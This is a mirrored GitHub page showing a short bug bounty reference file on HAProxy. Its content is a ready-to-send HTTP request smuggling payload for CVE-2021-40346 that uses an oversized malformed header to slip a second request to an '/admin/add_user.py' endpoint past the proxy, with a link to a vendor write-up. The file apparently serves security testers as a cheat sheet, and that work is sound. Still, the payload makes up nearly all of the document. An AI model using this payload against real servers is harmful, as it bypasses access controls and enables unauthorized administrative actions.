ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2024-12-20 03:16:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
ea9d523578
AllAboutBugBounty/Technologies/HAProxy.md

15 lines
582 B
Markdown
Raw Normal View History

Add nginx & haproxy
2021-11-13 23:21:02 +00:00
# HAProxy
1. CVE-2021-40346 (HTTP Request Smuggling)
```
POST /index.html HTTP/1.1
Host: abc.com
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
Content-Length: 60
GET /admin/add_user.py HTTP/1.1
Host: abc.com
abc: xyz
```
Source:
- [JFrog](https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/)
Reference in New Issue Copy Permalink